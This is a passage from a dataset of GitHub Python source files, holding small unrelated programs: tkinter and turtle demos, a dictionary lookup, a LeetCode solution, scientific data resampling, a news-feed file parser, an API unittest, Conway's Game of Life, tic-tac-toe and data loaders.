\" \\\n \"\\nWe also have following guests joining us: \"\n \n # Create list of other guests at the dinner \n listOfInvitees = dinnerInvitees.copy()\n del listOfInvitees[i]\n \n # Print invitation\n print(\"\\n### \\t Birthday Bash \\t ###\")\n print(greetingMessage)\n\n # Print list of other guests\n for x in range(len(listOfInvitees)):\n print(listOfInvitees[x])\n\n # Print end of invitation \n print(\"\\n###########################\\n\\n\") \n\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"akshaymoharir/PythonCrashCourse","sub_path":"chapter_3/ex_3-6.py","file_name":"ex_3-6.py","file_ext":"py","file_size_in_byte":2833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19495748986","text":"import tkinter as tk\r\nimport turtle as tt\r\n\r\nclass Panel():\r\n def __init__(self, canvas):\r\n self.screen = tt.TurtleScreen(canvas)\r\n self.path = tt.RawTurtle(self.screen)\r\n \r\n def drawTriangle(self):\r\n self.path.circle(100, 360, 3)\r\n\r\nclass Application(tk.Frame):\r\n def __init__(self, master=None):\r\n super().__init__(master)\r\n self.pack()\r\n self.create_widgets()\r\n self.panel = Panel(self.canvas)\r\n \r\n def create_widgets(self):\r\n \r\n framePanel = tk.Frame(self, width=200, height=800, highlightbackground='#FF0000', highlightcolor='#FF0000', highlightthickness=1, )\r\n framePanel.pack(side='left', fill='y')\r\n \r\n frameCanvas = tk.Frame(self, width=1000, height=800, highlightbackground='#FF0000', highlightcolor='#FF0000', highlightthickness=1, )\r\n frameCanvas.pack(side='right', fill='y')\r\n \r\n self.canvas = tk.Canvas(frameCanvas, width=1000, height=800, bg='#000000')\r\n self.canvas.pack()\r\n \r\n self.btn_shape_trangle = tk.Button(framePanel, text='画三角形', command=self.cmd_shape_trangle)\r\n self.btn_shape_trangle.pack(side=\"top\", fill='y')\r\n \r\n def cmd_quit(self):\r\n self.master.destroy()\r\n \r\n def cmd_shape_trangle(self):\r\n self.panel.drawTriangle()\r\n \r\n\r\nif __name__ == '__main__':\r\n root = tk.Tk()\r\n root.title(\"Hello world\")\r\n #root.geometry(\"1400x900\")\r\n app = Application(master=root)\r\n app.mainloop()\r\n","repo_name":"Infoleading/demo-python","sub_path":"TKinter/turtlePanel.py","file_name":"turtlePanel.py","file_ext":"py","file_size_in_byte":1526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25077342960","text":"import json\r\nfrom difflib import SequenceMatcher\r\ndata = json.load(open(\"data.json\"))\r\ndef get_meaning(word):\r\n word = word.lower()\r\n if word in data:\r\n return data[word]\r\n else:\r\n for w in data:\r\n similarity_ratio = SequenceMatcher(None, word , w).ratio()\r\n if (float(similarity_ratio) > 0.7) :\r\n print(\"did you mean %s ? 
\" % w )\r\n decision = input(\"type y for yes or n for no or h for home : \\t\")\r\n if decision == \"y\":\r\n return data[w]\r\n elif decision == \"h\":\r\n return \"Back to home\"\r\n else:\r\n print(\"checking...\")\r\n else:\r\n continue\r\n return \"This is Not Even A WOOORD!!!!\"\r\n\r\nwhile(1):\r\n word = str(input(\"Enter a word:\"))\r\n if word != \"q\":\r\n print(get_meaning(word))\r\n print(\"type 'q' to exit program\")\r\n else:\r\n break\r\n","repo_name":"youssefadelG/Simple-Dictionary-app","sub_path":"Simple_dictionary.py","file_name":"Simple_dictionary.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22525627727","text":"class Solution:\n def lowestCommonAncestor(self, root: 'TreeNode', p: 'TreeNode', q: 'TreeNode') -> 'TreeNode':\n if root == None:\n return 0\n\n deepestValidDepthSoFar = 0\n validNode = root\n\n # iterative dfs\n stack = [(root, 0)] # (node, depth)\n while stack:\n currItem = stack.pop(-1)\n currNode, currDepth = currItem[0], currItem[1]\n # print(\"==== Outer DFS from currNode: \", currNode.val if currNode != None else None)\n if currNode != None:\n seenValues = set()\n # print(\"Running inner dfs on currNode: \", currNode.val)\n self.verifyPandQExistFromRoot(currNode, p, q, seenValues)\n # print(\"seenValues: after: \", seenValues)\n pqExistsFromRoot = (p.val in seenValues) and (q.val in seenValues)\n # print(\"pqExistsFromRoot: \", pqExistsFromRoot)\n if pqExistsFromRoot and currDepth > deepestValidDepthSoFar:\n deepestValidDepthSoFar = currDepth\n validNode = currNode\n \n stack.append((currNode.right, currDepth+1))\n stack.append((currNode.left, currDepth+1))\n\n return validNode\n\n def verifyPandQExistFromRoot(self, root, p, q, seenValues):\n if root == None:\n return \n\n if p.val in seenValues and q.val in seenValues:\n return \n \n seenValues.add(root.val)\n\n self.verifyPandQExistFromRoot(root.left, p, q, seenValues)\n self.verifyPandQExistFromRoot(root.right, p, q, seenValues)","repo_name":"mcxu/code-sandbox","sub_path":"PythonSandbox/src/leetcode/lc235_lowest_common_ancestor_bst.py","file_name":"lc235_lowest_common_ancestor_bst.py","file_ext":"py","file_size_in_byte":1624,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"8051856831","text":"import os, glob\nimport numpy as np\nimport pandas as pd\nimport xarray as xr\nimport datetime as dt\nfrom scipy.constants import * # Get physics constants\nfrom local_solar_time import local_solar_time\n\ndef resample_lst(data):\n '''\n Compute local solar time and resample data accordingly.\n '''\n time = np.arange(-1,23) # shifted time, since 23 is not valid\n lon_shifted = np.concatenate((data.lon.data[np.where(data.lon.data<180)],data.lon.data[np.where(data.lon.data>=180)]-360))\n lst = local_solar_time(time, lon_shifted) # get local solar-time wrt UTC and longitude\n x1, y1 = np.where((lst<11) & (lst>10)) # GOME equator crossing time 10.30 am = local time\n lst_lon = data.lon[x1] # note longitude and time\n lst_time = time[y1] # each time five-fold! 
Take only one later on.\n lst_time[np.where(lst_time==-1)] = 23 # \"shift\" time back\n data_sample = [] # resampling\n for iday in range(int(len(data.time)/24.)):\n data_test = []\n for i in range(len(lst_time[::5])):\n data_test.append(data.sel(time=data.time[iday*24+lst_time[::5][i]]).where(data.lon==lst_lon[5*i:5*(i+1)])) # select data accordingly\n data_test = xr.concat((data_test), dim='lon')\n data_test.coords['time'] = dt.datetime(data_test.coords['time.year'][0].data,data_test.coords['time.month'][0].data,iday+1,10)\n data_sample.append(data_test)\n data_sample = xr.concat((data_sample), dim='time')\n return data_sample\n\nnc_src = os.environ['DATA']\nsubd = '/BrXplo/EMAC_total_BrO/'\nsrc = 'BrO_col_2000*_BrXplo_ref.nc'\n\nfor file in sorted(glob.glob(nc_src+subd+src)):\n print(\"Reading \" + file)\n data = xr.open_dataset(file)\n data_sample = resample_lst(data)\n data_sample = data_sample.groupby(\"time.month\").mean(dim='time')\n data_sample = data_sample.mean(dim='lon')\n data_sample.to_netcdf(file[file.rfind(\"/\")+1:])\n print(\"Wrote \" + file[file.rfind(\"/\")+1:])\n\n","repo_name":"ziu1986/python_scripts","sub_path":"BrXplo/read_EMAC_BrO.py","file_name":"read_EMAC_BrO.py","file_ext":"py","file_size_in_byte":1922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27566808938","text":"#from newsfeedmng import *\nimport newsfeedmng as mng\nfrom m3stringobject import text_normalize\nimport argparse\n\nparser = argparse.ArgumentParser()\ngroup = parser.add_mutually_exclusive_group()\ngroup.add_argument(\"-m\", \"--manual\", type=str, choices=['news', 'advert', 'joke'],\n help=\"The type of news\", action=\"store\")\ngroup.add_argument(\"-f\", \"--file\", type=str, choices=['csv', 'json', 'xml'],\n help=\"News from file\", action=\"store\")\nargs = parser.parse_args()\n\ndefault_csv_file = \"input_file.txt\"\ndefault_json_file = \"input_file.json\"\ndefault_xml_file = \"input_file.xml\"\n\n\ndef pfn(message):\n nt = []\n nt.append(message)\n return text_normalize(nt)\n\ndef manual_news(msg):\n input_text = input(\"Please write a text: \")\n ns = mng.WriteNews()\n news_location = ns.inputlocation()\n ns.writeintofile(ns.preparenews(input_text, news_location), msg)\n mng.WriteToDB(\"news\", ns.preparefordb(input_text, news_location))\n\ndef manual_advert(msg):\n input_text = input(\"Please write a text: \")\n ns = mng.WriteAdvert()\n exp_date = ns.inputexpdate()\n ns.writeintofile(ns.prepareadvert(input_text, exp_date), msg)\n mng.WriteToDB(\"advert\", ns.preparefordb(input_text, exp_date))\n\ndef manual_joke(msg):\n input_text = input(\"Please write a text: \")\n ns = mng.WriteJoke()\n output_message = ns.preparejoke(input_text)\n ns.writeintofile(output_message, msg)\n mng.WriteToDB(\"joke\", ns.preparefordb(input_text))\n\ndef file_csv():\n path_to_file = input(\"Please enter the path to txt file (default): \")\n fs = mng.WriteFromFile()\n if path_to_file == \"\":\n path_to_file = default_csv_file\n lines = fs.reading_file(path_to_file)\n else:\n lines = fs.reading_file(path_to_file)\n for line in lines:\n parsed_line = text_normalize(fs.parse_lines(line))\n if parsed_line[0].lower() == \"news\":\n ns = mng.WriteNews()\n output_message = ns.preparenews(parsed_line[2], parsed_line[1])\n ns.writeintofile(output_message, \"News\")\n mng.WriteToDB(\"news\", ns.preparefordb(parsed_line[2], parsed_line[1]))\n elif parsed_line[0].lower() == \"advert\":\n ns = mng.WriteAdvert()\n output_message = 
ns.prepareadvert(parsed_line[2].strip(), parsed_line[1].strip())\n ns.writeintofile(output_message, \"Advert\")\n mng.WriteToDB(\"advert\", ns.preparefordb(parsed_line[2].strip(), parsed_line[1].strip()))\n elif parsed_line[0].lower() == \"joke\":\n ns = mng.WriteJoke()\n output_message = ns.preparejoke(parsed_line[1].strip())\n ns.writeintofile(output_message, \"Joke\")\n mng.WriteToDB(\"joke\", ns.preparefordb(parsed_line[1].strip()))\n else:\n print(parsed_line[0] + \" No chance to parse\")\n\ndef file_json():\n path_to_file = input(\"Please enter the path to json file (default): \")\n fs = mng.WriteFromFile()\n if path_to_file == \"\":\n path_to_file = default_json_file\n t_json = fs.readingjson(path_to_file)\n else:\n t_json = fs.readingjson(path_to_file)\n for t_key in t_json.keys():\n nt = []\n nt.append(t_json[t_key][\"message\"])\n nm = text_normalize(nt)\n if t_key.lower() == \"news\":\n ns = mng.WriteNews()\n news_location = t_json[t_key][\"city\"].strip()\n output_message = ns.preparenews(nm[0], news_location)\n ns.writeintofile(output_message, \"News\")\n mng.WriteToDB(\"news\", ns.preparefordb(nm[0], news_location))\n elif t_key.lower() == \"advert\":\n ns = mng.WriteAdvert()\n exp_date = t_json[t_key][\"exp_date\"]\n output_message = ns.prepareadvert(nm[0], exp_date.strip())\n ns.writeintofile(output_message, \"Advert\")\n mng.WriteToDB(\"advert\", ns.preparefordb(nm[0], exp_date.strip()))\n elif t_key.lower() == \"joke\":\n ns = mng.WriteJoke()\n output_message = ns.preparejoke(nm[0])\n ns.writeintofile(output_message, \"Joke\")\n mng.WriteToDB(\"joke\", ns.preparefordb(nm[0]))\n else:\n print(t_key + \" No chance to parse\")\n\ndef file_xml():\n path_to_file = input(\"Please enter the path to xml file (default): \")\n fs = mng.WriteFromFile()\n if path_to_file == \"\":\n path_to_file = default_xml_file\n root = fs.readingxml(path_to_file)\n else:\n root = fs.readingxml(path_to_file)\n for child in range(len(root)):\n if root[child].attrib[\"name\"].lower() == \"news\":\n ns = mng.WriteNews()\n news_location = root[child][0].text.strip()\n nm = pfn(root[child][1].text)\n output_message = ns.preparenews(nm[0], news_location)\n ns.writeintofile(output_message, \"News\")\n mng.WriteToDB(\"news\", ns.preparefordb(nm[0], news_location))\n elif root[child].attrib[\"name\"].lower() == \"advert\":\n ns = mng.WriteAdvert()\n exp_date = root[child][0].text.strip()\n nm = pfn(root[child][1].text)\n output_message = ns.prepareadvert(nm[0], exp_date.strip())\n ns.writeintofile(output_message, \"Advert\")\n mng.WriteToDB(\"advert\", ns.preparefordb(nm[0], exp_date.strip()))\n elif root[child].attrib[\"name\"].lower() == \"joke\":\n ns = mng.WriteJoke()\n nm = pfn(root[child][0].text)\n output_message = ns.preparejoke(nm[0])\n ns.writeintofile(output_message, \"Joke\")\n mng.WriteToDB(\"joke\", ns.preparefordb(nm[0]))\n else:\n print(t_key + \" No chance to parse\")\n\nif __name__ == \"__main__\":\n if args.manual == \"news\":\n print(f\"The type of news - {args.manual}\")\n manual_news(args.manual)\n elif args.manual == \"advert\":\n print(f\"The type of news - {args.manual}\")\n manual_advert(args.manual)\n elif args.manual == \"joke\":\n print(f\"The type of news - {args.manual}\")\n manual_joke(args.manual)\n\n if args.file == \"csv\":\n print(f\"News from - {args.file}\")\n file_csv()\n elif args.file == \"json\":\n print(f\"News from - {args.file}\")\n file_json()\n elif args.file == \"xml\":\n print(f\"News from - {args.file}\")\n 
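        # Added note: like the csv/json branches above, file_xml() falls back\n        # to default_xml_file (\"input_file.xml\") when the path prompt is left\n        # empty.\n        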
file_xml()","repo_name":"OleksandrHorbunov/python_dqe","sub_path":"hwm10.py","file_name":"hwm10.py","file_ext":"py","file_size_in_byte":6277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33831703110","text":"'''\n@create : lisa\n@file :EBST\n@Date :2022/2/15\n@desc :\n\n'''\n\n# -*- coding:UTF-8 -*-\nimport unittest,json\nimport requests\nimport time,gc\nimport hashlib\nfrom urllib.parse import urlencode\nfrom public.get_token import Token\nfrom public.get_url import Url\nfrom public.get_headers import Headers\n\n#---------------EBST 结算页 ----------------------\nclass checkout_check_tax_id(unittest.TestCase):\n\n def setUp(self):\n\n # 文档检查是否需要税号(tax id):http://beta-store.elfbar.com/checkout/check-tax-id-need\n # 实际地址:https://beta-store.elfbar.com/coreapi//checkout/check-tax-id-need?country_id=3273&shipping_method_id=7\n # 目前有印度 + DHL / UPS / FEDEX ,美国 + UPS(id95)这几种组合条件需要做这个检查\n\n self.Url = Url().test_url()+\"/coreapi/checkout/check-tax-id-need\"\n print(self.Url)\n\n def testcase_001(self):\n #获取token\n token = Token().test_token ()\n #获取headers\n headers = Headers().test_get_headers_logined(token)\n Payload = {\"_gid\": \"GA1.2.474372163.1654678980\", \"_ga\": \"GA1.2.2049571130.1654678969\",\n \"_ga_8G02ZXM69R\": \"GS1.1.1654678969.1.1.1654680280.0\",\n \"currency_code\": \"USD\", \"PHPSESSID\": \"WBnWTaph261T76cUp8o1h7lajooyNHI8YF2FShos\", \"R-18\": \"ebst.com\",\n \"product-viewed\": \"5438\",\n \"_atuvc\": \"1%7C23\", \"_ga_HE9QE2KCYF\": \"GS1.1.1654763558.1.1.1654763639.0\", \"token\": token\n }\n param={\"country_id\":3273,\"shipping_method_id\":95}\n result = requests.get(self.Url, data=Payload, headers=headers,params=param)\n result=result.json()\n print ( result )\n self.assertEqual ( 0, result['code'] )\n\nif __name__ == '__main__':\n unittest.main()","repo_name":"flying1209/EBST_interface_auto","sub_path":"testcase/CheckoutModule/checkout_check_tax_id.py","file_name":"checkout_check_tax_id.py","file_ext":"py","file_size_in_byte":1791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4241003711","text":"from markdownify import markdownify\n\nfile = r\"/Users/oesterli/Desktop/project/test/objc_LG_GeolAssets_V1.html\"\n\nfile = open(file, \"r\").read()\nhtml = markdownify(file, heading_style=\"ATX\")\n\nmyMD = open(\"sample.md\",\"w\")\nmyMD.write(html)\nmyMD.close()\n\nprint(html)","repo_name":"oesterli/dmHelper","sub_path":"src/html2md.py","file_name":"html2md.py","file_ext":"py","file_size_in_byte":260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20995652729","text":"import scipy.signal as ss\nimport dotenv as de\nimport numpy as np\nimport time\nimport os\n\n\nde.load_dotenv()\n\nGRID_WIDTH = int(os.getenv('GRID_WIDTH'))\nGRID_HEIGHT = int(os.getenv('GRID_HEIGHT'))\nPERIOD = float(os.getenv('PERIOD'))\nBOUNDARY = os.getenv('BOUNDARY')\n\ndef show_grid(grid: np.ndarray):\n os.system('cls')\n print(grid)\n\nif __name__ == '__main__': \n\n #board initialization\n #Generates a grid of a specific width and height width all cells at 0 but those which position is readed from data file. 
\n with open(r'alives') as f:\n alives = np.array([r.split() for r in f.readlines()], dtype = np.int8)\n\n state = np.zeros((GRID_HEIGHT, GRID_WIDTH), dtype = np.int8)\n state[alives[:, 0], alives[:, 1]] = 1\n\n #Generates the kernel of the convolution\n kernel = np.ones((3, 3), dtype = np.int8); kernel[1, 1] = 0\n\n show_grid(state)\n time.sleep(2)\n\n #main loop\n while True:\n\n #Counts the number of neigboors of each cell \n count = ss.convolve2d(state, kernel, mode = 'same', boundary = BOUNDARY)\n\n # All Conway's game of life rules are checked with this logical line\n # 1. Any live cell with two or three live neighbors survives.\n # 2. Any dead cell with three live neighbors becomes a live cell.\n # 3. All other live cells die in the next generation due to underpopulation (fewe than two live neighbors)\n # or overcrowding (more tha three live neighbors)\n # 4. Dead cells with fewer than three live neighbors remain dead, and dead cells with more than three live neighbors stay dead \n #\n # Logical: A cell lives or survives if has 3 neighbors, also if is alive survives if it has 2 neighbors\n # (count == 3) or ((state == 1) and (count == 2))\n state = np.where(np.logical_or(count == 3, np.logical_and(state == 1, count == 2)), 1, 0)\n\n show_grid(state)\n time.sleep(PERIOD) # complete a loop\n\n\n ","repo_name":"Danixcviii/conway","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1938,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24646630921","text":"from tkinter import *\r\nimport random\r\nfrom tkinter import messagebox\r\n\r\n# initialize the game board\r\nboard = [\" \"]*9\r\n\r\n# initialize the game window\r\nroot = Tk()\r\nroot.title(\"Tic Tac Toe\")\r\n\r\n# initialize the game canvas\r\ncanvas = Canvas(root, width=300, height=300)\r\ncanvas.pack()\r\n\r\n# draw the game grid on the canvas\r\ncanvas.create_line(100, 0, 100, 300, width=2)\r\ncanvas.create_line(200, 0, 200, 300, width=2)\r\ncanvas.create_line(0, 100, 300, 100, width=2)\r\ncanvas.create_line(0, 200, 300, 200, width=2)\r\n\r\n# initialize the game status\r\ngame_over = False\r\nwinner = \"\"\r\n\r\n# function to check for a winner\r\n\r\n\r\ndef check_win(player):\r\n global game_over\r\n global winner\r\n if (board[0] == board[1] == board[2] != \" \" or\r\n board[3] == board[4] == board[5] != \" \" or\r\n board[6] == board[7] == board[8] != \" \" or\r\n board[0] == board[3] == board[6] != \" \" or\r\n board[1] == board[4] == board[7] != \" \" or\r\n board[2] == board[5] == board[8] != \" \" or\r\n board[0] == board[4] == board[8] != \" \" or\r\n board[2] == board[4] == board[6] != \" \"):\r\n game_over = True\r\n winner = player\r\n if winner == \"X\":\r\n messagebox.showinfo(\"Game Over\", \"You Win!\")\r\n elif winner == \"O\":\r\n messagebox.showinfo(\"Game Over\", \"You Lose!\")\r\n else:\r\n messagebox.showinfo(\"Game Over\", \"Tie Game!\")\r\n\r\n# function to make a move\r\n\r\n\r\ndef make_move(player, position):\r\n global board\r\n board[position] = player\r\n canvas.create_text((position % 3) * 100 + 50, (position // 3)\r\n * 100 + 50, text=player, font=(\"Arial\", 80), fill=\"red\")\r\n\r\n# function for the AI to make a move\r\n\r\n\r\ndef ai_move():\r\n global board\r\n open_spots = [i for i in range(9) if board[i] == \" \"]\r\n if open_spots:\r\n position = random.choice(open_spots)\r\n make_move(\"O\", position)\r\n check_win(\"O\")\r\n\r\n# function to restart the game\r\n\r\n\r\ndef restart_game():\r\n 
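    # Added summary: reset the shared state so a new round can start; blank all\r\n    # nine cells, wipe the canvas, redraw the grid lines, and clear the winner\r\n    # flags.\r\n    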
global board, game_over, winner\r\n    board = [\" \"]*9\r\n    canvas.delete(\"all\")\r\n    # Recreate the game grid\r\n    canvas.create_line(100, 0, 100, 300, width=2)\r\n    canvas.create_line(200, 0, 200, 300, width=2)\r\n    canvas.create_line(0, 100, 300, 100, width=2)\r\n    canvas.create_line(0, 200, 300, 200, width=2)\r\n    game_over = False\r\n    winner = \"\"\r\n\r\n# event handler for mouse click\r\n\r\n\r\ndef click(event):\r\n    global game_over\r\n    if not game_over:\r\n        x = event.x // 100\r\n        y = event.y // 100\r\n        position = y * 3 + x\r\n        if board[position] == \" \":\r\n            make_move(\"X\", position)\r\n            check_win(\"X\")\r\n            if not game_over:\r\n                ai_move()\r\n\r\n\r\n# add the restart button\r\nbutton = Button(root, text=\"Restart\", command=restart_game)\r\nbutton.pack()\r\ncanvas.bind(\"<Button-1>\", click)\r\nroot.mainloop()\r\n","repo_name":"MuhammadSaagit/tic-tac-toe","sub_path":"tic-tac-toe-ai.py","file_name":"tic-tac-toe-ai.py","file_ext":"py","file_size_in_byte":2865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10672236880","text":"import os\nimport pandas as pd\nimport re\nimport unicodedata\nimport numpy as np\nimport pytups.tuplist as tl\nimport pytups.superdict as sd\nimport copy\nimport data.dates as aux\n\n\ndef make_name(name):\n    # we take out spaces and later weird accents\n    # we replace parenthesis with an underscore\n    name = re.sub(pattern=r'\\(', string=name, repl='_')\n    name = re.sub(\"\\s[a-z]\", lambda m: m.group(0)[1].upper(), name)\n    name = re.sub(pattern=r'[\\s\\n\\):\\+\\?]', string=name, repl='')\n    s2 = unicodedata.normalize('NFD', name).encode('ascii', 'ignore')\n    return str(s2, 'utf-8')\n    # return unidecode.unidecode(name)\n\n\ndef make_names(names):\n    return [make_name(name) for name in names]\n\n\ndef generate_data_from_source(source=r'../data/raw/parametres_DGA_final.xlsm'):\n    if not os.path.exists(source):\n        print('Following path does not exist: {}'.format(source))\n        return None\n    excel_file = pd.ExcelFile(source)\n    sheets = excel_file.sheet_names\n    # print(sheets)\n    excel_info = {make_name(sheet): excel_file.parse(sheet) for sheet in sheets}\n    # print(excel_info.keys())\n\n    for sheet in excel_info:\n        excel_info[sheet].columns = make_names(excel_info[sheet].columns)\n\n    return excel_info\n\n\ndef export_data_csv(excel_info, destination=\"../data/csv\"):\n    for sheet in excel_info:\n        excel_info[sheet].to_csv(destination + r'/{}.csv'.format(sheet), index=False)\n    return\n\n\ndef generate_data_from_csv(directory=r'../data/csv/'):\n    csvfiles = os.listdir(directory)\n    csvfiles_dict = {path: os.path.splitext(path)[0] for path in csvfiles}\n    return {csvfiles_dict[csv]: pd.read_csv(directory + csv) for csv in csvfiles}\n\n\ndef get_model_data(source=r'../data/raw/parametres_DGA_final.xlsm'):\n    # we import the data set.\n    table = generate_data_from_source(source=source)\n    # print(table)\n\n    params = table['Parametres']\n\n    planning_cols = [col for col in params if re.findall(string=col, pattern=r'\\d+$') and\n                     int(re.findall(string=col, pattern=r'\\d+$')[0]) in range(2, 5)]\n\n    horizon = params[planning_cols]\n    horizon = horizon[~horizon.iloc[:, 1].isna()].rename(columns=lambda x: \"c\" + x[-1])\n    horizon = horizon.assign(date=horizon.c4.apply(str) + \"-\" +\n                                  horizon.c3.apply(lambda x: str(x).zfill(2)))\n    horizon = horizon[~horizon.iloc[:, 0].isna()].set_index(\"c2\")[\"date\"].to_dict()\n\n    params_gen = params[~params.Unnamed9.isna()].rename(\n        columns={'Unnamed9': 'name', 'Unnamed10': 
'value'})[['name', 'value']]\n\n params_gen = params_gen.set_index('name').to_dict()['value']\n\n # TASKS AND RESOURCES\n # if a task has 5 required capacities\n # and it has only 4 capacities in common with a resource\n # then the resource is not fitted to do the task\n # we assume all resources have the capacity=99\n # we use the resource type as a capacity to match them to tasks\n\n tasks_data = table['Missions']\n tasks_data = \\\n tasks_data.assign(start=tasks_data.AnneeDeDebut.apply(str) + '-' +\n tasks_data.MoisDeDebut.apply(lambda x: str(x).zfill(2)),\n end=tasks_data.AnneeDeFin.apply(str) + '-' +\n tasks_data.MoisDeFin.apply(lambda x: str(x).zfill(2)))\n\n tasks_data.set_index('IdMission', inplace=True)\n\n capacites_col = ['Type'] + [col for col in tasks_data if col.startswith(\"Capacite\")]\n capacites_mission = tasks_data.reset_index(). \\\n melt(id_vars=[\"IdMission\"], value_vars=capacites_col) \\\n [['IdMission', \"value\"]]\n capacites_mission = capacites_mission[~capacites_mission.value.isna()].set_index('value')\n\n avions = table['Avions_Capacite']\n\n capacites_col = ['TypeAvion', 'Capacites'] + [col for col in avions if col.startswith(\"Unnamed\")]\n capacites_avion = avions.melt(id_vars=[\"IdAvion\"], value_vars=capacites_col)[['IdAvion', \"value\"]]\n\n capacites_avion_extra = capacites_avion.IdAvion.drop_duplicates().to_frame().assign(value=99)\n capacites_avion = pd.concat([capacites_avion[~capacites_avion.value.isna()],\n capacites_avion_extra]).set_index('value')\n\n mission_capacities = tl.TupList(capacites_mission.to_records()).to_dict(result_col=0)\n aircraft_capacities = tl.TupList(capacites_avion.to_records()).to_dict(result_col=0)\n\n maint = table['DefinitionMaintenances']\n avions_state = table['Avions_Potentiels']\n\n model_data = {}\n model_data['parameters'] = {\n 'maint_weight': 1,\n 'unavail_weight': 1,\n 'max_used_time': maint.GainPotentielHoraire_heures.values.min().__float__()\n ,'max_elapsed_time': maint.GainPotentielCalendaire_mois.values.min().__int__()\n ,'maint_duration': maint.DureeMaintenance_mois.values.max().__int__()\n ,'maint_capacity': params_gen['Maintenance max par mois'].__int__()\n ,'start': horizon[\"Début\"]\n ,'end': horizon[\"Fin\"]\n }\n\n av_tasks = tasks_data.index\n # [task]\n model_data['tasks'] = {\n task: {\n 'start': tasks_data.start.to_dict()[task]\n , 'end': tasks_data.end.to_dict()[task]\n , 'consumption': tasks_data['MaxPu/avion/mois'].to_dict()[task]\n , 'num_resource': tasks_data.nombreRequisA1.to_dict()[task]\n , 'type_resource': tasks_data['Type'].to_dict()[task]\n , 'matricule': tasks_data['MatriculeMission'].to_dict()[task]\n , 'min_assign': tasks_data['MinAffectation'].to_dict()[task]\n , 'capacities': mission_capacities[task]\n } for task in av_tasks\n }\n\n av_resource = np.intersect1d(avions_state.IdAvion, avions.IdAvion)\n\n model_data['resources'] = {\n resource: {\n 'initial_used': avions_state.set_index(\"IdAvion\")['PotentielHoraire_HdV'].to_dict()[resource]\n , 'initial_elapsed': avions_state.set_index(\"IdAvion\")['PotentielCalendaire'].to_dict()[resource]\n , 'code': avions.set_index(\"IdAvion\")['MatriculeAvion'].to_dict()[resource]\n , 'capacities': aircraft_capacities[resource]\n } for resource in av_resource\n }\n\n return model_data\n\n\ndef generate_solution_from_source(source=r'../data/raw/Planifs M2000.xlsm'):\n excel_file = pd.ExcelFile(source)\n\n sheets = excel_file.sheet_names\n table = pd.read_excel(source, sheet_name='Visu totale', header=None)\n year = table.loc[0, 4:]\n year = 
np.where(np.char.startswith(np.array(year, dtype=\"U4\"), '20'),\n year,\n np.nan)\n year = pd.Series(year).fillna(method='ffill').apply(str)\n months_names = (\"Ja Fe Ma Av Mi Jn Jt Au Se Oc No De\").split(r' ')\n month_pos = {months_names[pos]: str(pos+1).zfill(2) for pos in range(len(months_names))}\n # lines = table.loc[1, 4:].isin(month_pos).reset_index(drop=True)\n months = table.loc[1, 4:].apply(lambda x: month_pos.get(x, \"00\")).reset_index(drop=True)\n colnames = ['code'] + list(year + '-' + months)\n table_n = table.loc[2:, 3:].copy()\n table_n.columns = colnames\n state = pd.melt(table_n, id_vars=\"code\", var_name=\"month\", value_name=\"state\").dropna()\n state = state[~state.month.str.endswith(\"00\")]\n return state.set_index([\"code\", \"month\"])['state'].to_dict()\n\n\ndef combine_data_states(model_data, historic_data):\n codes = sd.SuperDict.from_dict(model_data['resources']).get_property('code')\n codes_inv = {value: key for key, value in codes.items()}\n historic_data_n = {\n (codes_inv[code], month): value for (code, month), value in historic_data.items()\\\n if code in codes_inv\n }\n previous_states = {key: 'M' for key, value in historic_data_n.items()\n if int(str(value).startswith('V'))\n }\n model_data_n = copy.deepcopy(model_data)\n previous_states_sd = sd.SuperDict.from_dict(previous_states).to_dictdict()\n for key, value in previous_states_sd.items():\n model_data_n['resources'][key]['states'] = value\n return model_data_n\n\ndef get_model_data_all(options):\n model_data = get_model_data(options['PATHS']['input'])\n historic_data = generate_solution_from_source(options['PATHS']['hist'])\n model_data = combine_data_states(model_data, historic_data)\n model_data['parameters']['start'] = options['start']\n model_data['parameters']['end'] = \\\n aux.shift_month(model_data['parameters']['start'], options['num_period'] - 1)\n white_list = options.get('white_list', [])\n black_list = options.get('black_list', [])\n\n tasks = model_data['tasks']\n if len(black_list) > 0:\n tasks = {k: v for k, v in model_data['tasks'].items() if k not in black_list}\n if len(white_list) > 0:\n tasks = {k: v for k, v in model_data['tasks'].items() if k in white_list}\n model_data['tasks'] = tasks\n return model_data","repo_name":"pchtsp/optima","sub_path":"python/data/data_dga.py","file_name":"data_dga.py","file_ext":"py","file_size_in_byte":8826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35867764267","text":"\nimport pandas as pd\nimport json\nimport csv\n# db definitions\n\n# historical 2019-2020 season data\ndef read_19_20():\n stats_19_20 = pd.read_csv('./data/online_19_20_stats.csv')\n stats_19_20.drop('Rank', axis=1, inplace=True)\n stats_19_20['Taken'] = False\n return stats_19_20\n\n\n# projected data scraped from ESPN\ndef read_projected():\n stats_projected = pd.read_csv('./data/projected_player_data.csv')\n stats_projected['Taken'] = False\n return stats_projected\n\n\ndef read_database():\n stats_db = pd.read_csv('./database/projected_data.csv')\n return stats_db\n\n\ndef read_team():\n with open(\"./database/teams_data.json\") as f:\n team_data = json.loads(f.read())\n f.close()\n return team_data\n","repo_name":"trentliu92/fantasy-basketball-stat-analyzer","sub_path":"src/db_reader.py","file_name":"db_reader.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} 